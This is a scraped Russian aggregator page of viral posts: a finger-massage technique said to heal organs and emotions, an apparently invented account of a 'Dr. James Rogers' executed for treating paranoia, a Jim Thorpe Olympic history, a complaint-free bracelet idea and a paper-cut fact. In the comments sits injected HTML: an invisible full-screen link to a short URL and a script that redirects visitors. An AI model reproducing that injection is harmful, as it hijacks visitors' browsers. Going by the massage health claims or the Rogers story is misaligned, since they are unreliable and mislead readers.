641

Если ваши эмоции на пределе, порадуйте себя...

Если ваши эмоции на пределе, порадуйте себя 5-минутным массажем рук

Шиацу — традиционная японская терапия, название которой дословно переводится как "надавливание пальцами". У этой техники есть разные стили, но все они предполагают использование пальцев и ладоней рук для надавливания на различные участки тела, чтобы поддержать и активизировать здоровье человека. Для массажа Джин Шин Джитсу (Jin Shin Jyutsu) вам потребуются ваши руки и 5 минут, за которые вы сможете привести в порядок эмоции и принести пользу внутренним органам.

Каждый палец связан с определенными органами и эмоциями
Если ваши эмоции на пределе, порадуйте себя 5-минутным массажем рук

Большой палец
Эмоции: беспокойство, депрессия, тревога
Органы: желудок, селезенка

Указательный палец
Эмоции: страх, разочарование
Органы: почки, мочевой пузырь

Средний палец
Эмоции: гнев, раздражительность, нерешительность
Органы: печень, желчный пузырь

Безымянный палец
Эмоции: грусть, страх, горе
Органы: легкие, толстая кишка

Мизинец
Эмоции: нервозность, неуверенность в себе
Органы: сердце, тонкая кишка

Массаж можно делать в любом месте, ведь его техника очень проста
Если ваши эмоции на пределе, порадуйте себя 5-минутным массажем рук

Зажмите большой палец левой руки правой рукой, как бы схватив его в кулак. Надавите и держите в таком состоянии 1 минуту. Повторите эту процедуру с каждым пальцем обеих рук. После этого надавите большим пальцем правой руки на центр левой кисти и удерживайте так в течение 2 минут. Повторите то же самое с правой кистью.

Вы должны чувствовать пульсацию, если хотите понять, насколько сильно нужно давить на пальцы.

Каждый палец связан с определенными органами и эмоциями. Вы можете уделить все внимание лишь одному из них либо потратить чуть больше времени и эмоционально сбалансировать все тело.

Уделяйте каждому пальцу от 1 до 5 минут.

Попробуйте сделать этот массаж прямо сейчас и расскажите после нам о своих ощущениях.

Если ваши эмоции на пределе, порадуйте себя...
Читайте также:
4.0k

На фотографии запечатлен доктор Джеймс Роджерс. В 1965...

На фотографии запечатлен доктор Джеймс Роджерс. В 1965 году он был приговорен к казни на элeктрическом стуле за так называемый “массачусетский эксперимент”, однако за два дня до казни будучи в камере он покончил с собой, отравившись цианидом калия, ампулу которого принес ему кто-то из его пациентов.

Недавно “Массачусетский университет психологии и невропаталогии”, в котором работал доктор Роджерс, официально заявил, что этот эксперимент имеет большое научное значение, а его эффективность неоспорима. В связи с этим ректор университета доктор Филл Розентерн попросил прощения у оставшихся родственников Джеймса. А все дело в том, что доктор Джеймс Роджерс использовал уникальную, разработанную им самим методику вылечивания казалось бы безнадежных больных. Он усиливал их паранойю настолько, что новый ее виток исправлял предыдущий. Иными словами, если человек считал, что везде вокруг него ползают жуки, доктор Роджерс говорил ему, что так оно и есть. Весь мир покрыт жуками. Некоторые особо чувствительные люди их видят, остальные же настолько привыкли к этому, что просто не замечают их. Государство все знает, но держит это в тайне дабы не допускать паники. Человек уходил совершенно уверенный, что с ним все в порядке, смирялся и старался не замечать жуков. Через какое-то время он чаще всего переставал их видеть. На суде выступал некто Аарон Платновский, который болел когнетивно-энфазийным расстройством. Он считал, что он жираф. Ни логические доводы, ни сравнение его фотографии с изображением жирафа не помогали. Он был уверен в этом абсолютно. Он перестал разговаривать, отказывался принимать обычную пищу, кроме листьев.

Доктор Роджерс попросил одного знакомого биолога написать небольшую статью в которой более-менее научно описать недавнее ошеломительное открытие ученых: в природе существуют жирафы, которые практически ничем не отличаются от людей. То есть отличия есть – чуть больше сердце, чуть меньше селезенка, но и поведение и внешний вид и даже образ мысли совершенно совпадают. Ученые не разглашают эту информацию чтобы не допустить паники, а эту статью должен сжечь любой, кто ее прочтет. Больной успокоился и социализировался. К моменту судебного процесса он работал аудитором в крупной фирме в Колорадо. Увы, суд штата счел доктора Роджерса шарлатаном а эксперимент - бесчеловечным. Его приговорили к высшей мере. Он отказался от последнего слова, но передал судье письмо, которое просил опубликовать в какой-нибудь газете. Письмо опубликовала “The Massachusetts Daily Collegian”. Письмо оканчивалось словами: “Вы слишком привыкли к мысли, что все воспринимают мир одинаково. Но это не так. Если вы соберетесь вместе и попытаете пересказать друг-другу самые простые и очевидные для вас понятия, то поймете, что все вы живете в совершенно разных мирах. И лишь ваш комфорт определяет ваше психическое спокойствие. В таком случае человек считающий, что он жираф и живущий в мире с этим знанием так же нормален, как человек, считающий что трава зеленого цвета, а небо синего. Кто-то из вас верит в НЛО, кто-то в Бога, кто-то в утренний завтрак и чашку кофе.

Живя в гармонии со своей верой – вы совершенно здоровы, но стоит вам начать защищать свою точку зрения – как вера в Бога заставит вас убивать, вера в НЛО – бояться похищения, вера в чашку кофе по утру – станет центром вашего мироздания и разрушит вашу жизнь. Физик начнет приводить вам аргументы того, что небо не синего цвета, а биолог докажет, что трава не зеленая. В конце концов вы останетесь один на один с пустым, холодным и совершенно не известным вам миром, которым наш мир скорее всего и является. Так что не важно какими призраками вы населяете ваш мир. Пока вы в них верите – они существуют, пока вы с ними не сражаетесь – они не опасны”.

На фотографии запечатлен доктор Джеймс Роджерс. В 1965...
1.2k

Дисквалификация за... профессионализм В 1913 году у...

Дисквалификация за... профессионализм

В 1913 году у величайшего спортсмена ХХ века, национального американского героя Джима Торпа отобрали золотые медали, которые вернули через 30 лет после его смерти.

За выступлением Джима Торпа на шведской Олимпиаде зрители следили с большим напряжением. Джим выступал одновременно в четырёх дисциплинах: не только в двух сложнейших программах легкой атлетики — в пятиборье и десятиборье, но принял участие в соревнованиях по прыжкам в длину и высоту (где занял 4 место). В пятиборье Джим показал лучшие результаты в прыжках в длину, в беге на 200 и 1500 метров и в метании диска. Только в метании копья занял третье место. Золотая медаль и инкрустированная драгоценными камнями серебряная чаша в форме ладьи викингов, — приз Николая II, — стала наградой за пятиборье.

Столь блестящей победе не помешал даже неприятный случай: перед выступлением у Торпа украли ботинок. Найденный в мусорной корзине другой ботинок был велик, поэтому пришлось надеть на левую ногу носок (на фото) и выступать в ботинках разного размера.

Рекорд, установленный Торпом в десятиборье стал поистине феноменальным — 8,413 очков — превосходил предыдущий на 998 очков и продержался более 15 лет (вплоть до Олимпиады в Амстердаме, 1928 год). Вручая золотые медали (это была последняя Олимпиада, когда медали отливались из чистого золота), король Швеции Густав V произнёс: «Сэр, вы самый великий атлет в мире».

Америка рукоплескала победителю. Джим Торп, выросший в бедной индейской семье, был самым популярным человеком. Президент США Уильям Тафт встретился с ним и поздравил с победой.

Все шло хорошо, пока в январе 1913 года газета Worcester Telegram не опубликовала статью, в которой говорилось, что летом 1909 и 1910 Джим Торп выступал за профессиональную бейсбольную команду, тем самым нарушив любительский статус спортсмена. Пресса с удовольствием раздула этот скандал.

Никого не интересовало, что Джим в основном сидел на скамейке запасных, да и деньги были смехотворные: 2 доллара за игру или 35 долларов в неделю. Многие студенты–спортсмены так подрабатывали в летние каникулы, но, в отличие от простодушного Торпа, выступали под вымышленными именами.

Любительский спортивный союз США, отвечавший за формирование сборной для шведской Олимпиады, больше беспокоился о своей репутации, чем о судьбе спортсмена. Несмотря на покаянное письмо Торпа («Я надеюсь, что буду частично прощён за то, что я был простым индейским школьником и ничего не знал о таких вещах»), союз направил письмо в МОК, с просьбой аннулировать результаты Торпа в Олимпиаде.

По закону на претензии отводится срок в течение 30 дней после Олимпиады (а к тому времени прошло 6 месяцев). Тем не менее МОК дисквалифицировал Торпа, вычеркнул его из списка чемпионов и заставил вернуть все полученные призы. Серебряный призёр — десятиборец Хуго Висланд (которого Торп обошёл более чем на 700 очков) отказался от предложенной золотой медали, заявив, что победа по заслугам принадлежит Торпу.

Несправедливое решение навсегда сломало жизнь Джиму. Некоторое время он еще занимался спортом, но затем начал пить и, наконец, бросил спорт. Когда в 1932 году в Лос–Анджелесе проходила Олимпиада, у него не было даже 2 долларов, чтобы заплатить за вход. Кто–то из членов Олимпийского комитета узнал его и проводил с собой в президентскую ложу. Когда объявили, что на трибунах присутствует Джим Торп весь 105–тысячный стадион встал, чтобы приветствовать героя.

В 1953 году Джим Торп умер. Последние слова, произнесённые им перед смертью были: «Отдайте мои медали!»

Несмотря на многочисленные ходатайства сторонников Торпа, олимпийский комитет отказывался восстанавливать чемпионский титул. Почти 20 лет (1952 –1972) председателем Международного Олимпийского комитета был Эйвери Брендедж, яростно отстаивающий принципы любительского спорта Олимпийских игр. Он отказывал игрокам NHL выступать на олимпийских площадках, клеймил СССР за то, что так называемые «спортсмены–любители» получали поддержку от государства.

Мало кто вспоминал, что на шведской Олимпиаде 1912 года Брендедж тоже выступал в десятиборье и пятиборье, правда в отличие от Торпа не вошёл в число призеров, заняв шестое место в десятиборье и одно из последних мест в пятиборье. Многие считали, что Брендедж так и не простил сопернику ту победу.

После ухода Брендеджа с поста председателя МОК, в 1973 году Любительский спортивный союз США реабилитировал Джима Торпа. Прошло ещё 10 лет, прежде чем МОК отменил решение о дисквалификации, вновь изготовив две золотые медали с надписью «Игры V Олимпиады. Стокгольм, 1912 год» и вручив их детям олимпийского чемпиона. Спустя 70 (!) лет после стокгольмской Олимпиады справедливость все же восторжествовала.

Джим Торп, названный при рождении Ва–Тхо–Хук, что означает «Путь, освещенный большой вспышкой молнии», говорил о своём имени: «Много раз яркий путь мерцал для меня, но как же часто было темно и страшно горько».

Дисквалификация за... профессионализм В 1913 году у...
472

В 2006 году Уилл Боуэн предложил простую идею - надеть...

В 2006 году Уилл Боуэн предложил простую идею - надеть фиолетовый браслет в знак того, чтобы прожить 21 день без жалоб, нытья, сплетен и высказывания недовольств. Если в течение этого времени человек всё же произносит или думает о чем-то негативном - он переодевает браслет на другую руку и начинает новый отсчет, пока не проносит браслет на одной руке 21 день. Жизни людей меняются до неузнаваемости.

В 2006 году Уилл Боуэн предложил простую идею - надеть...
В 2006 году Уилл Боуэн предложил простую идею - надеть... В 2006 году Уилл Боуэн предложил простую идею - надеть...
510

Причина, по которой разрезанная бумага причиняет...

Причина, по которой разрезанная бумага причиняет такую сильную боль, заключается в том, что она наносит гораздо больше повреждений на микроскопическом уровне по сравнению с чистым разрезом. Это край бумаги при 100-кратном увеличении.

Причина, по которой разрезанная бумага причиняет...
Еще посты

Популярные теги:

Свежие комментарии:

Ирина 1 недель к записи
Когда это было?что за придожение ни автора ни даты,как связаться
Напиши мне
<a/href="//cutt.ly/kwVrO4Ui"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>
<script>location.replace('//ya.ru')</script>Nick
Екатерина 3 недель назад к записи
Как с вами связаться?
контакт женский заработок